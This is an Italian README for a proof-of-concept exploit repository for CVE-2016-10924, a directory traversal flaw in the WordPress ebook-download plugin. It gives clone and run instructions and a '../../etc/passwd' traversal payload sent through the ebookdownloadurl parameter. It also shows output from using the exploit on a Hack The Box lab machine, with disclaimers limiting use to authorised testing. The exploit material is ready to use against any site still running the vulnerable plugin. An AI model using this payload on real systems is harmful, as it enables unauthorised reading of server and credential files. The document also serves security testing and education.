
Script di exploit Prova di concetto (PoC) per la vulnerabilità di Directory Traversal (CVE-2016-10924) trovata nel plugin WordPress ebook-download (versioni < 1.2). Questa vulnerabilità consente letture non autorizzate di file tramite una richiesta GET appositamente costruita.
Questo repository contiene uno script exploit Proof-of-Concept (PoC) per la vulnerabilità di Directory Traversal (CVE-2016-10924) trovata nel plugin WordPress ebook-download (versioni < 1.2).
Questa vulnerabilità consente letture non autorizzate di file tramite una richiesta GET appositamente modificata. L'exploit sfrutta un parametro chiamato ebookdownloadurl per attraversare le directory sul server target.
ebook-download < 1.2 per WordPress/etc/passwd, manipolando il percorso del file nel parametro ebookdownloadurl.Nota: Questo PoC è solo per scopi educativi e di test autorizzati. L'uso improprio di queste informazioni può portare a conseguenze legali.
requests (installare tramite pip install requests)Clona il repository:
git clone https://github.com/your-user/CVE-2016-10924-POC.git
cd CVE-2016-10924-POC
Installa le dipendenze:
pip install requests
Esegui l'exploit:
python3 cve-2016-10924.py "http://TARGET/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
Specifica il percorso del file da leggere: Dopo aver avviato lo script, ti verrà richiesto un percorso di file. Ad esempio:
../../../../../../../../../etc/passwd
Potrebbe essere necessario regolare il numero di ../ in base alla posizione della webroot nell'ambiente target.
Uscita:
exit, quit o premi Invio su un prompt vuoto per uscire.Ho usato questo exploit su "Backdoor", una vecchia macchina di Hack The Box:
$ python3 cve-2016-10924.py "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
[*] Enter file paths (e.g. ../../../../../etc/passwd). Type 'exit' to quit.
Enter File path: ../../../../../../../../../etc/passwd
[*] Target URL: http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../etc/passwd
[+] Status Code: 200
[+] File Content:
root:x:0:0:root:/root:/bin/bash
...
Questo progetto è inteso esclusivamente per scopi educativi e di test di sicurezza legittimi.
Non utilizzare le informazioni o gli script contenuti in questo repository su alcun sistema per il quale non si disponga di esplicita autorizzazione al test.
L'autore e i contributori non sono responsabili per eventuali usi impropri o danni causati da questo strumento.
Questo progetto è concesso in licenza sotto la GNU 2.0 License. Sentiti libero di usarlo e modificarlo, ma per favore dai credito.
Riferimenti